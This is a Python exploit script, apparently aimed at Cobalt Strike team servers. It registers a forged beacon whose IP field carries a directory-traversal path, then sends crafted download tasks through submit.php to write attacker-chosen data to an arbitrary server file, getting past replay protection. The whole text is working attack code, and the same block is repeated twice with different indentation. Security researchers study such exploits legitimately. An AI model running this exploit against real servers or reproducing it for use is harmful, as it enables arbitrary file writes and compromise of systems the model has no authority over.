olliencc/exploit.py

## exploit.py
# First we need to register a beacon with a directory traversal in the ip address field
    ip_address = "../../../../../../%s" % os.path.split(args.filepath)[0]

    # Generate symmetric keys (used later)
    raw_aes_keys = os.urandom(16)
    aes_key, hmac_key = generate_keys(raw_aes_keys)

    m = Metadata(public_key=args.public_key, cs_version=3)
    m.public_key = args.public_key
    m.bid = args.bid
    m.pid = args.pid
    m.ver = "10.0"
    m.intz = ip_address
    m.comp = args.computer
    m.user = args.username
    m.is64 = '1' # 64-bit OS
    m.barch = '1' # 64-bit beacon
    m.raw_aes_keys = raw_aes_keys
    m.calculate_aes()
    enc = m.pack()

    # register the beacon
    print "[*] Staging beacon .."
    register_beacon(enc, args.target, args.uri, args.host, args.ssl)

    # Now we need to push a DOWNLOAD_START response to cause a file write
    print "[*] Creating file .."
    data, fid = build_download_task(os.path.split(args.filepath)[1], aes_key, hmac_key)

    # Send it to the server. This is the equivalent of touch(filepath)
    # submit.php should be replaced with malleable C2 setting if applicable
    beacon_checkin(args.target, 'submit.php', data, args.bid, args.host, args.ssl)

    # Build another task which is going to write the data to the touched file
    # We force the counter to be higher than the last task to avoid replay protection
    print "[*] Sending data .."
    data = build_download_data(args.filedata, fid, aes_key, hmac_key, counter()+100)

    # Fire it..
    beacon_checkin(args.target, 'submit.php', data, args.bid, args.host, args.ssl)
    print "[+] Done!"
	# First we need to register a beacon with a directory traversal in the ip address field
	ip_address = "../../../../../../%s" % os.path.split(args.filepath)[0]

	# Generate symmetric keys (used later)
	raw_aes_keys = os.urandom(16)
	aes_key, hmac_key = generate_keys(raw_aes_keys)

	m = Metadata(public_key=args.public_key, cs_version=3)
	m.public_key = args.public_key
	m.bid = args.bid
	m.pid = args.pid
	m.ver = "10.0"
	m.intz = ip_address
	m.comp = args.computer
	m.user = args.username
	m.is64 = '1' # 64-bit OS
	m.barch = '1' # 64-bit beacon
	m.raw_aes_keys = raw_aes_keys
	m.calculate_aes()
	enc = m.pack()

	# register the beacon
	print "[*] Staging beacon .."
	register_beacon(enc, args.target, args.uri, args.host, args.ssl)

	# Now we need to push a DOWNLOAD_START response to cause a file write
	print "[*] Creating file .."
	data, fid = build_download_task(os.path.split(args.filepath)[1], aes_key, hmac_key)

	# Send it to the server. This is the equivalent of touch(filepath)
	# submit.php should be replaced with malleable C2 setting if applicable
	beacon_checkin(args.target, 'submit.php', data, args.bid, args.host, args.ssl)

	# Build another task which is going to write the data to the touched file
	# We force the counter to be higher than the last task to avoid replay protection
	print "[*] Sending data .."
	data = build_download_data(args.filedata, fid, aes_key, hmac_key, counter()+100)

	# Fire it..
	beacon_checkin(args.target, 'submit.php', data, args.bid, args.host, args.ssl)
	print "[+] Done!"